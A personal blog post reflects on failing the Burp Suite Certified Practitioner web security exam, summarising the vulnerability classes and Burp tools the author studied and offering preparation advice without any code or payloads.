I failed my first attempt at the Burp Suite Certified Practitioner Exam (BSCP). It definitely hurt and was a blow to my ego. Especially after having studied so much for months on end.
For those who don’t know, the BSCP is an exam based on Portswigger’s Web Security Academy training. It’s 100% practical and tests your competency in not only identifying common web vulnerabilities, but successfully exploiting them.
The exam consists of two web apps, each of which you have to go from initial access, then escalate your privileges to administrator, then find an RCE to read a flag stored in a file. Sounds easy, but you need to have at least an intermediate (practitioner) level of understanding on a wide-range of web security topics and a strong knowledge of Burp Pro.
This challenge drew me in, as I knew I would learn a ton even just studying for it. And for $99!? I mean come on!
I successfully completed one application but got stuck on the second one. After I got initial access, I just couldn’t figure out how to get to admin. And that’s the thing — one stage can trip you up and cause you to fail.
So, I took my failure hard initially but with a grain of salt. I definitely didn’t walk away without gaining a ton of knowledge. Which, I’ll share with you now!
What I learned
Strong Understanding of Web Vulnerabilities
Portswigger’s Web Security Academy is renowned for being one of the best resources for learning web application security. And it’s completely free!
I had experience with basic OWASP top 10 vulnerabilities including XSS, SSRF, and JWT vulnerabilities. But studying for this course expanded me far beyond that.
For the vulnerabilities I was already familiar with, I gained a stronger understanding of why they occur in the real-world. On top of that, I learned many different, advanced vulnerabilities, including, HTTP Request smuggling, Insecure De-serialization, prototype parameter pollution, and Web Cache Poisoning.
Not only did I understand them in theory, but I learned how to practically exploit them in impactful ways. For example, I learned how Web Cache Poisoning can lead to arbitrary JS inclusion in popular, static pages for high-impact XSS.
More Efficient Testing
Before preparing for the exam, my bug hunting methodology mostly consisted of spraying and praying. I’d find interesting endpoints and fuzz them to try to induce errors.
This worked in some cases, but turning these “findings” into exploits was difficult.
Now, I have a solid understanding of the contexts in which these vulnerabilities are likely to occur. I can take a look at some functionality and narrow my testing to vulnerabilities that are likely to occur in the given input, tech stack, functional flow, etc…
The exam prep also taught me how to leverage automation to speed up my manual testing.
In addition to learning how to create custom, targeted scans in Burp, I was exposed to a lot of useful extensions. I learned how to use HTTP Request Smuggler to identify and exploit request smuggling, Param Miner to identify unkeyed inputs vital to exploiting Web Cache Poisoning, and Collaborator Everywhere to identify SSRF in uncommon contexts (to name a few).
Burp Knowledge
Solving all of the practitioner labs and completing the exam successfully requires a strong knowledge of Burp Suite Pro (hence the name “Burp Suite Certified Practitioner”).
Prior to preparing for the exam, the extent of my knowledge of Burp was using the Repeater, Intruder, and proxy history at a basic level. Now, I know how to confidently use these features and learned about other tools as well.
For example, I know how to configure Repeater to manually test for race conditions and HTTP request smuggling, which requires precise control over request ordering and payload byte length. I also use Comparer to analyze fuzzing results and Intruder to structure payloads for more advanced attacks, such as fuzzing within JWTs.
Troubleshooting payloads
Because the exam required not only the detection of vulnerabilities but exploitation, I had to efficiently debug payloads when they inevitably went wrong.
One example would be successfully exploiting HTTP Request smuggling to capture user requests. HTTP Request Smuggling payloads are very sensitive. One wrong newline or incorrectly calculating the content length can throw the entire exploit off. Not only that, but timing is essential when poisoning the response queue. It can take a few tries to successfully pull off an exploit even with a technically sound payload.
While exploring XSS—especially DOM XSS—I learned how to leverage browser developer tools and DOM Invader to trace sources and sinks, refine payloads, and debug exfiltration techniques.
Obfuscation Techniques
In my opinion, the test was more difficult than any of the labs. I won’t speak to my exam, but I will use the practice exams as examples (skip this section if you don’t want the practice tests spoiled).
In practice test one, you need to exploit DOM XSS to exfiltrate a user’s session cookie for initial access. However, basic filtering prevents you from using a basic payload.
You have to experiment to figure out what is being blocked, then adjust your payload accordingly using encodings that fit the context. This sounds simple but is stressful to pull off with a time constraint.
My advice to you
I not only learned a lot of technical skills preparing for this exam. I also learned how to best prepare for the exam that could have only been learned for trial and error.
Hopefully, this will help you in your journey to take the BSCP.
Don’t take shortcuts
The Web Security Academy is extremely dense. Portswigger has its own list of recommended labs you need to complete to prepare.
But I highly recommend studying every topic and doing every lab to at least the Practitioner level. For one, the biggest takeaway from the process is the learning. A certification is meaningless if you can’t back it up through skills.
I failed the exam but I believe the learning I underwent to be much more valuable than the exam results itself. So, be patient and take your time. Truly understand the material you’re learning.
I strongly recommend taking notes as you study the topics and document how you solved each lab. I added a “takeaways” section at the end of each lab writeup which captured my own learnings out of the technical skills I gained. This would include, for example, any mistakes I made or improvements I could make in future labs.
Learn from the solutions
The solutions should only be viewed as a last resort. Ideally, you should be able to solve the lab by reviewing and understanding the material alone.
However, the solutions can give you insight on the most efficient way to get to the solution. Especially, the community solutions. You can get an idea of how other people approach testing a specific vulnerability class.
I learned how to group requests to test for race conditions with the Repeater and how to use turbo intruder to automatically test for them as well.
Embrace the struggle
Learning all of these vulnerabilities and working through every lab is hard. So, don’t beat yourself up if you’re struggling or taking extra time to understand something.
Struggle is a key sign of growth. If you’re struggling and having difficulty with something, you’re learning.
Without challenging yourself, you’re not doing any learning. So, embrace the struggle as a sign that you’re improving your skills.
Supplement your learning
It can be easy to fall into the trap of perfectionism. I had the mindset for a while that if I didn’t finish all of the labs first, I wouldn’t be ready to apply what I learned.
But, it’s important to apply what you learned no matter what stage you’re in. Bug hunt to experience how real world apps are structured and to strengthen your recon skills. Write blog articles to reinforce what you’ve learned. Build labs of vulnerabilities you learned.
Go beyond the labs. This not only solidifies your learning but will develop your career as well.
Conclusion
The BSCP is the hardest certification I’ve attempted thus far. But its challenge and focus on practicality is what makes it so great.
I highly recommend at least preparing for the exam, as you will learn most of what you need for a career in web application penetration testing.
You also can’t beat the $99 price tag.
I failed and will definitely be going back for a second attempt. I cannot emphasize enough how much I’ve developed as a tester.
Thanks for reading and I wish you the best in your security journey!